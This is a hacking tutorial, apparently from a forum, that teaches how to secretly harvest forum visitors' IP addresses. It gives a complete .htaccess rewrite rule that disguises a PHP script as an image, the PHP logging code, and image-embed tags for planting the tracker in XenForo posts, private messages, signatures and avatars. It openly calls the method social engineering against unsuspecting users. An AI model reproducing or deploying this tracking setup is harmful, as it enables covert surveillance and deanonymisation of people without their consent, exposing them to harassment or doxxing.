Xenforo Vulnerability

1. Xenforo vulnerability to get visitor's IP being external user not sysadmin.
2.  
3.  
4. READ THIS TUTORIAL MADE BY TTG_POPEYES
5.  
6. Or.. just use grabify.. (https://grabify.link/image)
7.  
8. Step 1.) 
9.  
10. Find a free webhost you can use. 
11.  
12. The one I use is FreeHostia.com 
13. Just register for a free account there. 
14.  
15. -- 
16.  
17. Step 2.) 
18.  
19. Make a new web directory 
20. example: [ Register or Signin to view external links. ]
21.  
22. -- 
23.  
24. Step 3.) 
25.  
26. Create a new file named: 
27.  
28. .htaccess 
29.  
30. -- 
31.  
32. Step 4.) 
33.  
34. Put this code in .htaccess 
35.  
36. Code: 
37. RewriteEngine on 
38. RewriteRule ^image.gif$ iplogger.php 
39.  
40. Where it says: image.gif 
41.  
42. You can change it to where you`ve uploaded your image, it doesn`t matter what image and it can be in any image type such as: gif, jpeg, png, etc. 
43.  
44. Where it says: iplogger.php 
45.  
46. That is the PHP file that will have the Ip logging code, whatever you want to name it. 
47.  
48. -- 
49.  
50. Step 5.) 
51.  
52. Create an empty iplogger.php file (or whatever you named it) 
53.  
54. And put in this code: 
55.  
56. Code: 
57. <?php 
58. $log = 'logger.html'; 
59. $ip = $_SERVER['REMOTE_ADDR']; 
60. $page = $_SERVER['REQUEST_URI']; 
61. $refer = $_SERVER['HTTP_REFERER']; 
62. $date_time = date("l j F Y g:ia", time() - date("Z")) ; 
63. $agent = $_SERVER['HTTP_USER_AGENT']; 
64. $fp = fopen("logger.html", "a"); 
65. fputs($fp, " 
66. <b>$date_time</b> <br> <b>IP: </b>$ip<br><b>Page: </b>$page<br><b>Refer: </b>$refer<br><b>Useragent: 
67.  
68. </b>$agent <br><br> 
69. "); 
70. flock($fp, 3); 
71. fclose($fp); 
72. ?> 
73.  
74. Then create an Empty: 
75.  
76. logger.html file 
77.  
78. -- 
79.  
80. Step 6.) 
81.  
82. Upload your image.gif file (or whatever you named it) 
83.  
84. if you haven`t already 
85.  
86. -- 
87.  
88. Step 7.) 
89.  
90. Go to a forum or wherever you would like 
91.  
92. And insert the image using: 
93.  
94. Code: 
95. [ Register or Signin to view external links. ] 
96.  
97. You can insert this in: 
98.  
99. - Pm`s 
100. - Posts & Threads 
101. - Signatures 
102. - Avatars 
103. -And anything else that allows external linking of images. 
104.  
105. If you would like to insert your image using HTML where is allowed then use this code: 
106.  
107. Code: 
108. <IMG SRC="http://site.com/directory/image.gif"> 
109.  
110. -- 
111.  
112. Step 8.) 
113.  
114. Check your: [ Register or Signin to view external links. ] 
115.  
116. For all your IP logs including where they came from.
117.  
118. -- 
119.  
120. How it WORKS: 
121.  
122. Basically, 
123.  
124. When the web tries to access the Image that is in the directory with the .htaccess file. 
125.  
126. The image.gif displays iplogger.php 
127.  
128.  
129.  
130. Step 9.)
131.  
132. Insert this url inside a post in xenforo using IMAGE BY URL (https://m.imgur.com/a/t91Qba7)
133.  
134. And wait for people to enter, it's more social engineering than anything, using a website's reputation to obtain ips.
135.  
136. ~ GhostyCeh